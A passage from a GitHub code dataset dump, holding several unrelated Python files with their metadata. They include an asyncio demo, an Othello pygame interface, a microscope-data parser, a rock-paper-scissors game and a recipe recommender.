safe)))\r\n","repo_name":"itsmo1031/problem-solving","sub_path":"백준/Silver/17086. 아기 상어 2/아기 상어 2.py","file_name":"아기 상어 2.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15690432675","text":"# 获取协程的返回值\nimport asyncio\nfrom functools import partial\n\nasync def get_html(url):\n print(\"start get url\")\n await asyncio.sleep(2)\n return \"bobby\"\n\n\ndef callback(url, future):\n print(url)\n print(\"send email to bobby\")\n print(future)\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop() # 事件循环,可以往里面注册协程\n # future = asyncio.ensure_future(get_html(\"http://www.imooc.com\")) # 将协程注册到loop中\n task = loop.create_task(get_html(\"http://www.imooc.com\")) # 将协程注册到loop中\n task.add_done_callback(partial(callback, \"http://www.imooc.com\"))\n # loop.run_until_complete(future)\n loop.run_until_complete(task)\n\n print(task.result())\n","repo_name":"zelinhehe/myPythonTest","sub_path":"AdvancePython-master/chapter13/loop_test2.py","file_name":"loop_test2.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"28494084997","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n left_dummy = curr_left = ListNode()\n right_dummy = curr_right = ListNode()\n curr = head\n \n while curr != None:\n if curr.val >= x:\n curr_right.next = ListNode(curr.val)\n curr_right = curr_right.next\n else:\n curr_left.next = ListNode(curr.val)\n curr_left = curr_left.next\n curr = curr.next\n curr_left.next = right_dummy.next\n return left_dummy.next\n \n ","repo_name":"fasil729/Comptetive-Programming-A2SV","sub_path":"0086-partition-list/0086-partition-list.py","file_name":"0086-partition-list.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"20616134858","text":"\"\"\"The main SCALA class that represents an Omicron SCALA file.\n\"\"\"\n\nimport numpy as np\nimport os\n\nclass OMICRONscala:\n \"\"\"This is the main class that represents an Omicron SCALA file\n \n Args:\n filepath: the name of the .par file to be opened\n \"\"\"\n\n def __init__(self,\n filepath):\n \"\"\"Load data and metadata relative to the given .par file\n \n Args:\n filepath: path to the .par file.\n \n Returns: metadata as dictionary and data as numpy array\n \n \"\"\"\n\n self._filepath = filepath\n self._path = os.path.dirname(filepath)\n\n self._meta = self._loadMeta()\n self._data = self._loadData()\n\n self._channels = self._addChannels()\n\n def __getitem__(self, index):\n return self._channels[index]\n\n def _loadMeta(self):\n \"\"\"Load metadata from .par file into a dictionary\n \n Returns: dictionary of metadata\n \n \"\"\"\n\n # Open .par file and load content\n with open(self._filepath) as f:\n meta = f.readlines()\n\n # Remove newline character and whitespaces\n meta = [e.strip() for e in meta]\n meta = [e.replace(' ','') for e in meta]\n\n # Remove final comment part\n meta = [e.split(';',1)[0] for e in meta]\n\n # Remove empty lines\n meta = [e for e in meta if e not in ('', ';')]\n\n # Add key to channel parameters, for each channel\n self._chlist = list()\n self._imglist = list()\n self._speclist = list()\n self._SpecParameter = ''\n\n for i,e in enumerate(meta):\n if 'TopographicChannel' in e:\n chName = meta[i+8][-3:].upper()+\"_\"\n meta[i] = chName+meta[i]\n meta[i+1] = chName+'Direction:'+meta[i+1]\n meta[i+2] = chName+'MinimumRawValue:'+meta[i+2]\n meta[i+3] = chName+'MaximumRawValue:'+meta[i+3]\n meta[i+4] = chName+'MinimumPhysValue:'+meta[i+4]\n meta[i+5] = chName+'MaximumPhysValue:'+meta[i+5]\n meta[i+6] = chName+'Resolution:'+meta[i+6]\n meta[i+7] = chName+'PhysicalUnit:'+meta[i+7]\n meta[i+8] = chName+'Filename:'+meta[i+8]\n meta[i+9] = chName+'DisplayName:'+meta[i+9]\n\n self._chlist.append(chName)\n self._imglist.append(chName)\n\n elif 'SpectroscopyChannel' in e:\n chName = meta[i+16][-3:].upper()+\"_\"\n meta[i] = chName+meta[i]\n self._SpecParameter = meta[i+1]\n meta[i+1] = chName+'Parameter:'+meta[i+1]\n meta[i+2] = chName+'Direction:'+meta[i+2]\n meta[i+3] = chName+'MinimumRawValue:'+meta[i+3]\n meta[i+4] = chName+'MaximumRawValue:'+meta[i+4]\n meta[i+5] = chName+'MinimumPhysValue:'+meta[i+5]\n meta[i+6] = chName+'MaximumPhysValue:'+meta[i+6]\n meta[i+7] = chName+'Resolution:'+meta[i+7]\n meta[i+8] = chName+'PhysicalUnit:'+meta[i+8]\n meta[i+9] = chName+'NumberSpecPoints:'+meta[i+9]\n meta[i+10] = chName+'StartPoint:'+meta[i+10]\n meta[i+11] = chName+'EndPoint:'+meta[i+11]\n meta[i+12] = chName+'Increment:'+meta[i+12]\n meta[i+13] = chName+'AcqTimePerPoint:'+meta[i+13]\n meta[i+14] = chName+'DelayTimePerPoint:'+meta[i+14]\n meta[i+15] = chName+'Feedback:'+meta[i+15]\n meta[i+16] = chName+'Filename:'+meta[i+16]\n meta[i+17] = chName+'DisplayName:'+meta[i+17]\n\n self._chlist.append(chName)\n self._speclist.append(chName)\n\n elif self._SpecParameter+'Parameter' in e:\n meta[i] = 'SpecParam:'+self._SpecParameter\n meta[i+1] = 'SpecParamRampSpeedEnabled:'+meta[i+1]\n meta[i+2] = 'SpecParamT1us:'+meta[i+2]\n meta[i+3] = 'SpecParamT2us:'+meta[i+3]\n meta[i+4] = 'SpecParamT3us:'+meta[i+4]\n meta[i+5] = 'SpecParamT4us:'+meta[i+5]\n\n # Split list into pairs\n meta = [e.split(':',1) for e in meta]\n\n # Create dictionary for metadata\n meta = {k:v for k,v in meta}\n\n # Adjust date as YYYY-MM-DD and time as HH:MM\n year = '20'+meta['Date'][6:8]\n month = meta['Date'][3:5]\n day = meta['Date'][0:2]\n hours = meta['Date'][8:10]\n seconds = meta['Date'][11:13]\n\n meta['Time'] = hours+':'+seconds\n meta['Date'] = year+'-'+month+'-'+day\n\n # Calculate timestamp in seconds\n timeStamp = meta['Date']+'T'+meta['Time']+\":00\"\n meta['Timestamp'] = timeStamp\n\n return meta\n\n def _loadData(self):\n \"\"\"Load data from .par file into a numpy array\n \n Returns: multidimensional numpy array\n \n \"\"\"\n\n # Initialize data array\n xsize = int(self._meta['ImageSizeinX'])\n ysize = int(self._meta['ImageSizeinY'])\n data = list()\n\n # Cycle over image channels\n for i, chPrefix in enumerate(self._imglist):\n chFile = self._meta[chPrefix+'Filename']\n # Load data from current channel\n data.append(np.resize(np.fromfile(os.path.join(self._path, chFile),dtype='>i2'), (xsize, ysize)))\n\n # Return data\n return data\n\n def _addChannels(self):\n\n channels = list()\n\n for i, chName in enumerate(self._imglist):\n\n data = self._data[i]\n attrs = dict()\n for k,v in self._meta.items():\n if chName in k:\n key = k.replace(chName, '')\n if key in ['MinimumRawValue', 'MaximumRawValue', 'NumberSpecPoints']:\n attrs[key] = int(v)\n elif key in ['MinimumPhysValue', 'MaximumPhysValue', 'Resolution',\n 'StartPoint', 'EndPoint', 'Increment', 'AcqTimePerPoint:', 'DelayTimePerPoint']:\n attrs[key] = float(v)\n else:\n attrs[key] = v\n attrs.pop(\"Filename\")\n\n channel = OMICRONchannel(data, {**attrs, **self._globAttrs()})\n channels.append(channel)\n\n return channels\n\n def _globAttrs(self):\n\n attrs = self._meta.copy()\n\n for i, chName in enumerate(self._chlist):\n for k,v in self._meta.items():\n if chName in k:\n del attrs[k]\n\n float_keys = ['FieldXSizeinnm',\n 'FieldYSizeinnm',\n 'IncrementX',\n 'IncrementY',\n 'ScanAngle',\n 'XOffset',\n 'YOffset',\n 'GapVoltage',\n 'FeedbackSet',\n 'LoopGain',\n 'XResolution',\n 'YResolution',\n 'ScanSpeed',\n 'XDrift',\n 'YDrift',\n 'TopographyTimeperPoint',\n 'ZSpeed',\n 'ZOutputGain',\n 'ZInputGain']\n int_keys = ['Format',\n 'ImageSizeinX',\n 'ImageSizeinY',\n 'SpectroscopyGridValueinX',\n 'SpectroscopyGridValueinY',\n 'SpectroscopyPointsinX',\n 'SpectroscopyLinesinY',\n 'SpecParamT1us',\n 'SpecParamT2us',\n 'SpecParamT3us',\n 'SpecParamT4us']\n\n for k,v in attrs.items():\n if k in float_keys:\n attrs[k] = float(v)\n elif k in int_keys:\n attrs[k] = int(v)\n\n return attrs\n\nclass OMICRONchannel:\n \n def __init__(self, data, attrs):\n \n self.data = data\n self.attrs = attrs\n\n if self.attrs['TopographicChannel'] == \"Z\":\n channel = \"Topography\"\n elif self.attrs['TopographicChannel'] == \"I\":\n channel = \"Current\"\n else:\n channel = self.attrs['TopographicChannel']\n self.label = channel + \"_\" + self.attrs['Direction']\n\n xsize = self.attrs['ImageSizeinX']\n xres = self.attrs['IncrementX']\n ysize = self.attrs['ImageSizeinY']\n yres = self.attrs['IncrementY']\n self.coords = [('y', yres * np.arange(ysize, dtype=np.float)),\n ('x', xres * np.arange(xsize, dtype=np.float))]\n","repo_name":"rescipy-project/spym","sub_path":"spym/io/omicronscala/_scala.py","file_name":"_scala.py","file_ext":"py","file_size_in_byte":8611,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"17917115219","text":"from openpipeAPI.ORM.ORM import ORM\nfrom openpipeAPI.ORM.TO import TO\n\ntables = TO().getClasses()\norm = ORM()\ndata=orm.executeSelect(\"select a.id,artist_tags.topic_id from (SELECT * FROM artmaster.metaTag where tagName='openpipe_canonical_artist') as a join artist_tags on a.value=artist_tags.value\")\nMetaTag = tables[\"metaTag\"]\nfor d in data[\"data\"]:\n orm.session.query(MetaTag).filter(MetaTag.id == int(d[\"id\"][0])).update({\"topic_name\": \"artist\", \"topic_id\": int(d[\"topic_id\"][0])})\norm.commitClose()\n","repo_name":"MEC402/openpipe","sub_path":"backend/openpipeAPI/ReverseGUID.py","file_name":"ReverseGUID.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"32330552242","text":"import pygame, sys, time, os\r\nfrom pygame.locals import *\r\nimport time\r\nfrom variables import azul, blanco, dificultad, humano, computadora\r\n\r\nclass Graphics:\r\n\r\n def __init__(self):\r\n pygame.init()\r\n\r\n self.negro = (0, 0, 0)\r\n self.morado = (216, 191, 216)\r\n self.blanco = (255, 255, 255)\r\n self.azul = (0, 0, 205)\r\n\r\n self.screensize = (640, 480)\r\n self.posiciontablero = (100, 20)\r\n self.tablero = (120, 40)\r\n self.tablerotamano = 400\r\n self.espaciotamano = 50\r\n self.screen = pygame.display.set_mode(self.screensize)\r\n self.azulpalabrapos = (5, self.screensize[1] / 4)\r\n self.blancopalabrapos = (560, self.screensize[1] / 4)\r\n self.font = pygame.font.SysFont(\"Courier-Bold\", 22)\r\n self.puntuacionfont = pygame.font.SysFont(\"TrebuchetMS\", 58)\r\n self.tableroimg = pygame.image.load('tablero.png')\r\n self.azulimg = pygame.image.load('ficha azul.png')\r\n self.blancoimg = pygame.image.load('ficha blanca.png')\r\n self.tipimg = pygame.image.load('ficha tips.png')\r\n self.vacioimg = pygame.image.load('cuadrado amarillo.png')\r\n self.animacion1img = pygame.image.load('animacion 1.png')\r\n self.animacion2img = pygame.image.load('animacion 2.png')\r\n\r\n def mostraropciones(self):\r\n jugador1 = humano\r\n jugador2 = computadora\r\n nivel = dificultad\r\n\r\n while True:\r\n self.screen.fill(self.morado)\r\n titulofont = pygame.font.SysFont(\"Courier-Bold\", 34)\r\n titulo = titulofont.render(\"Othello\", True, self.blanco)\r\n tituloposicion = titulo.get_rect(centerx=self.screen.get_width() / 2, centery=60)\r\n\r\n comenzartexto= self.font.render(\"Comenzar\", True, self.blanco)\r\n comenzarposicion = comenzartexto.get_rect(centerx=self.screen.get_width() / 2, centery=220)\r\n jugador1texto = self.font.render(\"Primer jugador \", True, self.blanco)\r\n jugador1pos = jugador1texto.get_rect(centerx=self.screen.get_width() / 2, centery=260)\r\n jugador2texto = self.font.render(\"Segundo jugador \", True, self.blanco)\r\n jugador2pos = jugador2texto.get_rect(centerx=self.screen.get_width() / 2, centery=300)\r\n niveltexto = self.font.render(\"Nivel de computadora \", True, self.blanco)\r\n nivelpos = niveltexto.get_rect(centerx=self.screen.get_width() / 2, centery=340)\r\n humanotexto = self.font.render(\"Humano\", True, self.blanco)\r\n computadoratexto = self.font.render(\"Computadora\", True, self.blanco)\r\n\r\n self.screen.blit(titulo, tituloposicion)\r\n self.screen.blit(comenzartexto, comenzarposicion)\r\n self.screen.blit(jugador1texto, jugador1pos)\r\n self.screen.blit(jugador2texto, jugador2pos)\r\n self.screen.blit(niveltexto, nivelpos)\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n sys.exit(0)\r\n elif event.type == MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n if comenzarposicion.collidepoint(mouse_x, mouse_y):\r\n return jugador1, jugador2, nivel\r\n elif jugador1pos.collidepoint(mouse_x, mouse_y):\r\n jugador2 = self.elegirjugador()\r\n elif jugador2pos.collidepoint(mouse_x, mouse_y):\r\n jugador2 = self.elegirjugador()\r\n elif nivelpos.collidepoint(mouse_x, mouse_y):\r\n nivelpos = self.elegirnivel()\r\n\r\n pygame.display.flip()\r\n\r\n def mostrarganador(self, colorjugador):\r\n self.screen.fill(pygame.Color(0, 0, 0, 50))\r\n font = pygame.font.SysFont(\"Courier-Bold\", 34)\r\n if colorjugador == blanco:\r\n msg = font.render(\"Blanco ganó\", True, self.blanco)\r\n elif colorjugador == azul:\r\n msg = font.render(\"Azul ganó\", True, self.blanco)\r\n else:\r\n msg = font.render(\"Empate\", True, self.blanco)\r\n self.screen.blit(msg, msg.get_rect(centerx=self.screen.get_width() / 2, centery=120))\r\n pygame.display.flip()\r\n\r\n def elegirjugador(self):\r\n while True:\r\n self.screen.fill(self.morado)\r\n titulofont = pygame.font.SysFont(\"Courier\", 34)\r\n titulo = titulofont.render(\"Othello\", True, Color(0, 0, 205))\r\n tituloposicion = titulo.get_rect(centerx=self.screen.get_width() / 2,centery=60)\r\n humanotexto = self.font.render(\"Humano\", True, self.blanco)\r\n humanopos = humanotexto.get_rect(centerx=self.screen.get_width() / 2, centery=120)\r\n computadoratexto = self.font.render(\"Computer\", True, self.blanco)\r\n computadorapos = computadoratexto.get_rect(centerx=self.screen.get_width() / 2,centery=360)\r\n\r\n self.screen.blit(titulo, tituloposicion)\r\n self.screen.blit(humanotexto, humanopos)\r\n self.screen.blit(computadoratexto, computadorapos)\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n sys.exit(0)\r\n elif event.type == MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n if humanopos.collidepoint(mouse_x, mouse_y):\r\n return humano\r\n elif computadorapos.collidepoint(mouse_x, mouse_y):\r\n return computadora\r\n pygame.display.flip()\r\n\r\n def elegirnivel(self):\r\n while True:\r\n self.screen.fill(self.morado)\r\n titulofont = pygame.font.SysFont(\"Courier\", 34)\r\n titulo = titulofont.render(\"Othello\", True, self.azul)\r\n tituloposicion = titulo.get_rect(centerx=self.screen.get_width() / 2,centery=60)\r\n unotexto = self.font.render(\"Nivel 1\", True, self.blanco)\r\n unopos = unotexto.get_rect(centerx=self.screen.get_width() / 2,centery=120)\r\n dostexto = self.font.render(\"Nivel 2\", True, self.blanco)\r\n dospos = dostexto.get_rect(centerx=self.screen.get_width() / 2,centery=240)\r\n trestexto = self.font.render(\"Nivel 3\", True, self.blanco)\r\n trespos = trestexto.get_rect(centerx=self.screen.get_width() / 2,centery=360)\r\n\r\n self.screen.blit(titulo, tituloposicion)\r\n self.screen.blit(unotexto, unopos)\r\n self.screen.blit(dostexto, dospos)\r\n self.screen.blit(trestexto, trespos)\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n sys.exit(0)\r\n elif event.type == MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n if unopos.collidepoint(mouse_x, mouse_y):\r\n return 1\r\n elif dospos.collidepoint(mouse_x, mouse_y):\r\n return 2\r\n elif trespos.collidepoint(mouse_x, mouse_y):\r\n return 3\r\n\r\n pygame.display.flip()\r\n time.sleep(.05)\r\n\r\n def mostrarjuego(self):\r\n self.background = pygame.Surface(self.screen.get_size()).convert()\r\n self.background.fill(self.morado)\r\n self.puntajetamano = 50\r\n self.puntaje1 = pygame.Surface((self.puntajetamano, self.puntajetamano))\r\n self.puntaje2 = pygame.Surface((self.puntajetamano, self.puntajetamano))\r\n self.screen.blit(self.background, (0, 0), self.background.get_rect())\r\n self.screen.blit(self.tableroimg, self.posiciontablero, self.tableroimg.get_rect())\r\n self.ponerpieza((3, 3), blanco)\r\n self.ponerpieza((4, 4), blanco)\r\n self.ponerpieza((3, 4), azul)\r\n self.ponerpieza((4, 3), azul)\r\n pygame.display.flip()\r\n\r\n def ponerpieza(self, pos, color):\r\n if pos == None:\r\n return\r\n pos = (pos[1], pos[0])\r\n if color == azul:\r\n img = self.azulimg\r\n elif color == blanco:\r\n img = self.blancoimg\r\n else:\r\n img = self.tipimg\r\n\r\n x = pos[0] * self.espaciotamano + self.tablero[0]\r\n y = pos[1] * self.espaciotamano + self.tablero[1]\r\n\r\n self.screen.blit(img, (x, y), img.get_rect())\r\n pygame.display.flip()\r\n\r\n def espaciovacio(self, pos):\r\n pos = (pos[1], pos[0])\r\n x = pos[0] * self.espaciotamano + self.tablero[0]\r\n y = pos[1] * self.espaciotamano + self.tablero[1]\r\n self.screen.blit(self.vacioimg, (x, y), self.vacioimg.get_rect())\r\n pygame.display.flip()\r\n\r\n def movimientomouse(self):\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == MOUSEBUTTONDOWN:\r\n (mouse_x, mouse_y) = pygame.mouse.get_pos()\r\n if mouse_x > self.tablerotamano + self.tablero[0] or \\\r\n mouse_x < self.tablero[0] or \\\r\n mouse_y > self.tablerotamano + self.tablero[1] or \\\r\n mouse_y < self.tablero[1]:\r\n continue\r\n\r\n posicion = ((mouse_x - self.tablero[0]) // self.espaciotamano), \\\r\n ((mouse_y - self.tablero[1]) // self.espaciotamano)\r\n posicion = (posicion[1], posicion[0])\r\n return posicion\r\n elif event.type == QUIT:\r\n sys.exit(0)\r\n time.sleep(.05)\r\n\r\n def update(self, tablero, azules, blancos):\r\n for f in range(8):\r\n for c in range(8):\r\n if tablero[f][c] != 0:\r\n self.ponerpieza((f, c), tablero[f][c])\r\n\r\n azulesstr = '%02d ' % int(azules)\r\n blancosstr = '%02d ' % int(blancos)\r\n self.mostrarpuntaje(azulesstr, blancosstr)\r\n pygame.display.flip()\r\n\r\n def mostrarpuntaje(self, azulstr, blancostr):\r\n texto = self.puntuacionfont.render(azulstr, True, self.azul, self.morado)\r\n texto1 = self.puntuacionfont.render(blancostr, True, self.blanco, self.morado)\r\n self.screen.blit(texto, (self.azulpalabrapos[0], self.azulpalabrapos[1] + 40))\r\n self.screen.blit(texto2, (self.blancopalabrapos[0], self.blancopalabrapos[1] + 40))\r\n\r\n def quit(self):\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n sys.exit(0)\r\n elif event.type == KEYDOWN:\r\n break\r\n\r\n","repo_name":"tamaraortizr/boardgame","sub_path":"graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":10548,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12138338791","text":"#! /usr/bin/env python3\nimport glob\nimport re\nimport sys\nfrom collections import defaultdict\nfrom math import log\n\n# artist_pro{key=artist,value=[frequency1,frequency2...]}\nartist_pro = defaultdict(list)\nfor single_word in sys.argv[1:]:\n for file in glob.glob(\"lyrics/*.txt\"):\n with open(file, 'r') as fp:\n total_words = 0\n Word = single_word.capitalize()\n occur_time = 0\n for lines in fp:\n number = re.findall(r'[a-zA-Z]+', lines)\n total_words += len(number)\n line = re.findall(r'[a-zA-Z]+', lines)\n occur_time += line.count(single_word)\n if Word != single_word:\n occur_time += line.count(Word)\n if single_word.upper() != Word:\n occur_time += line.count(single_word.upper())\n \n # frequency = (int(occur_time) + 1) / int(total_words)\n filename = []\n for string in file:\n filename.append(string)\n not_real_filename = ''.join(filename[7:-4])\n real_filename = not_real_filename.replace('_', ' ')\n artist_pro[real_filename].append((int(occur_time) + 1) / int(total_words))\n # artist_pro[real_filename].append(frequency)\n\nfor key, value in artist_pro.items():\n temp_list = []\n for index in range(len(value)):\n temp_list.append(log(value[index]))\n total = sum(temp_list)\n artist_pro[key].append(total)\n\nsort_dic = sorted(artist_pro.items(), key=lambda x: x[0])\nfor item in sort_dic:\n print(f'{item[1][-1]:10.5f} {item[0]}')\n\n\n","repo_name":"junbaic/COMP9044","sub_path":"lab exercise/lab08/lyrics/log_probability.py","file_name":"log_probability.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38876379408","text":"class Solution:\n def numberOfSpecialSubstrings(self, s: str) -> int:\n d = defaultdict(int)\n total = 0\n l = 0\n\n for r in range(len(s)):\n d[s[r]] += 1\n\n while d[s[r]] > 1:\n d[s[l]] -= 1\n l += 1\n total += r - l + 1\n return total\n","repo_name":"kai3n/Daily-commit-project","sub_path":"jamespak/week35/2743. Count Substrings Without Repeating Character.py","file_name":"2743. Count Substrings Without Repeating Character.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"47038681308","text":"import tkinter as tk\r\nfrom random import randint\r\nfrom tkinter import Label, ttk\r\nroot=tk.Tk()\r\n#root.iconbitmap('rpc.ico')\r\nroot.config(bg=\"white\")#change background color to gray\r\nrock= tk.PhotoImage(file='D:/MCA/Projects/rock.jpeg')\r\npaper= tk.PhotoImage(file='D:/MCA/Projects/p.png')\r\nscissor=tk.PhotoImage(file='D:/MCA/Projects/sci.jpeg')\r\n#add image to a list\r\nimage_list=[rock,paper,scissor]\r\n#pick random number between 0 and 2\r\npick_number=randint(0,2)\r\nimage_label= tk.Label(root,image=image_list[pick_number], bd=0)\r\nimage_label.pack(pady=20)\r\n#create spin funtion\r\ndef spin():\r\n #pick random number\r\n pick_number=randint(0,2)\r\n #show image\r\n image_label.config(image=image_list[pick_number])\r\n # 0- rock\r\n # 1- paper\r\n # 2- scissor\r\n #convert dropdown choice to a number\r\n if user_choice.get()== \"Rock\":\r\n user_choice_value=0\r\n elif user_choice.get()==\"Paper\":\r\n user_choice_value=1\r\n else:\r\n user_choice_value=2\r\n #determine if we won or lost\r\n if user_choice_value==0:\r\n if pick_number ==0:\r\n win_lose_label.config(text=\"It's a tie! Spin again...\")\r\n elif pick_number==1:\r\n win_lose_label.config(text=\"Paper covers rock! You loose...\")\r\n elif pick_number==2:\r\n win_lose_label.config(text=\"Rock can break scissor! You win...\")\r\n if user_choice_value==1:\r\n if pick_number ==1:\r\n win_lose_label.config(text=\"It's a tie! Spin again...\")\r\n elif pick_number==2:\r\n win_lose_label.config(text=\"Scissor cuts paper! You loose...\")\r\n elif pick_number==0:\r\n win_lose_label.config(text=\"Paper covers rock! You win...\")\r\n if user_choice_value==2:\r\n if pick_number ==2:\r\n win_lose_label.config(text=\"It's a tie! Spin again...\")\r\n elif pick_number==0:\r\n win_lose_label.config(text=\"Rock smash scissor! You loose...\")\r\n elif pick_number==1:\r\n win_lose_label.config(text=\"Scissor cuts paper! You win...\")\r\n# create choice\r\nuser_choice=ttk.Combobox(root,value=(\"Rock\",\"Paper\",\"Scissor\"))\r\nuser_choice.current(0)\r\nuser_choice.pack(pady=20)\r\n#create spin button\r\nspin_button=tk.Button(root,text=\"spin!\",command=spin)\r\nspin_button.pack(pady=10)\r\n# label for result\r\nwin_lose_label=Label(root,text=\"\",font=(\"Helvetica\",18))\r\nwin_lose_label.pack(pady=50)\r\nroot.mainloop()","repo_name":"ashwini17055570009/stonePaperScissor","sub_path":"stonePaperSissor.py","file_name":"stonePaperSissor.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36136364169","text":"import argparse\nimport os\nimport sys\nimport copy\n\nfrom pero_ocr.document_ocr.layout import PageLayout\n\n\ndef parse_arguments():\n print(' '.join(sys.argv))\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--data\", required=True, type=str, help=\"Path to a folder containing xml data.\")\n parser.add_argument(\"--out\", required=True, type=str, help=\"Path to a folder to save output.\")\n\n args = parser.parse_args()\n return args\n\n\ndef filter_lines(pagexml: PageLayout) -> PageLayout:\n _pagexml = copy.copy(pagexml)\n\n for region in _pagexml.regions:\n region.lines = [line for line in region.lines if line.transcription.strip() or line.transcription.strip() != \"\"]\n\n return _pagexml\n\n\ndef filter_regions(pagexml: PageLayout) -> PageLayout:\n _pagexml = copy.copy(pagexml)\n\n _pagexml.regions = [region for region in pagexml.regions if \\\n len(region.lines) > 0 \\\n and not (len(region.lines) == 1 and len(region.lines[0].transcription.strip()) < 5) \\\n and not all(line.transcription.strip().isdigit() for line in region.lines)]\n\n return _pagexml\n\n\ndef filter_pagelayout(pagexml: PageLayout) -> PageLayout:\n _pagexml = copy.copy(pagexml)\n\n _pagexml = filter_lines(_pagexml)\n _pagexml = filter_regions(_pagexml)\n\n return _pagexml\n\n\ndef main(args):\n for filename in os.listdir(args.data):\n if not filename.endswith(\".xml\"):\n continue\n\n path = os.path.join(args.data, filename)\n pagexml = PageLayout(file=path)\n pagexml = filter_pagelayout(pagexml)\n\n out_path = os.path.join(args.out, filename)\n pagexml.to_pagexml(file_name=out_path)\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n main(args)\n","repo_name":"Faz0lek/textbite","sub_path":"textbite/pagexml/filter_xml.py","file_name":"filter_xml.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39269396478","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nDATA_FOLDER = \"./data/\"\nSUBSET = 0.01\ndata = pd.read_csv(f\"{DATA_FOLDER}vector-0.01.csv\")\nmapping = pd.read_csv(f\"{DATA_FOLDER}mapping-{SUBSET}.csv\", sep=\",\")\n\n\ndef get_vectors(data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Return a dataframe with the data vectors based on the mapping\"\"\"\n dummies = pd.get_dummies(mapping.ingredient)\n\n def convert_to_vectors(row):\n ingredient_list = row[\"NER\"]\n vector_list = [np.expand_dims(dummies[i].values, axis=0) for i in ingredient_list]\n return np.concatenate(vector_list, axis=0).sum(axis=0, keepdims=True)\n \n vectors = data.apply(convert_to_vectors, axis=1)\n vectors = np.concatenate(vectors.values.tolist(), axis=0)\n\n return pd.DataFrame(data=vectors, columns=mapping.ingredient.values, index=data[\"title\"]).reset_index()\n\ndef topk(vector: pd.DataFrame, k: int = 5) -> pd.DataFrame:\n vector = vector.iloc[:, 1:].values\n sim = cosine_similarity(vector, data.iloc[:, 1:].values)\n topk = (-sim).argsort()[:, :k]\n\n sim_scores = sim[:, topk[0]][0]\n meals = data.iloc[topk[0]][\"title\"].values\n ingredients = data.iloc[topk[0], 1:]\n\n diff = ingredients.values - vector\n missing_list = []\n for i in range(len(diff)):\n missing = np.where(diff[i] == 1)[0]\n missing_list.append(missing)\n\n scores = sim_scores - np.array([len(m) * 0.1 for m in missing_list])\n res = pd.DataFrame(dict(name=meals, sim_score=sim_scores, score=scores, missing_id=missing_list))\n res = res.sort_values(by=\"score\", ascending=False).reset_index(drop=True)\n\n return res\n\ndef missing_names(missing_list: list):\n names = [\n mapping.iloc[missing].ingredient.values\n for missing in missing_list\n ]\n return names\n","repo_name":"AntoineBlanot/papAIa","sub_path":"api/recom.py","file_name":"recom.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12138895621","text":"# Insert your code here\nfile_name = input('Which data file do you want to use? ')\nlist_rectangle1, list_x, list_y = [], [], []\nwith open(f'{file_name}', 'r') as file:\n for line_items in file:\n for x in line_items.strip().split():\n x1, x2 = int((line_items.strip().split())[0]), int((line_items.strip().split())[2])\n y1, y2 = int((line_items.strip().split())[1]), int((line_items.strip().split())[3])\n list_rectangle1.append((x1, y1, x2, y2))\n list_x.append(x1)\n list_x.append(x2)\n list_y.append(y1)\n list_y.append(y2)\nsort_list_x = sorted(set(list_x))\nsort_list_y = sorted(set(list_y))\nprint(sort_list_x)\nprint(sort_list_y)\nrect_top, rect_bottom, rect_left, rect_right = {}, {}, {}, {}\nfor item in list_rectangle1:\n rect_top[item] = ((item[0], item[3]), (item[2], item[3]))\n rect_bottom[item] = ((item[0], item[1]), (item[2], item[1]))\n rect_left[item] = ((item[0], item[1]), (item[0], item[3]))\n rect_right[item] = ((item[2], item[1]), (item[2], item[3]))\nx_perimeter, y_perimeter = 0, 0\ncondition = [0, 0]\nfor index_y in range(1, len(sort_list_y)):\n for x in sort_list_x:\n for left_rect, right_rect in zip(rect_left.keys(), rect_right.keys()):\n if sort_list_y[index_y] > rect_left[left_rect][0][1]:\n if sort_list_y[index_y] <= rect_left[left_rect][1][1]:\n if x == rect_left[left_rect][1][0]:\n if condition[0] < 1:\n y_perimeter = y_perimeter + (sort_list_y[index_y] - sort_list_y[index_y - 1])\n condition[0] = condition[0] + 1\n if 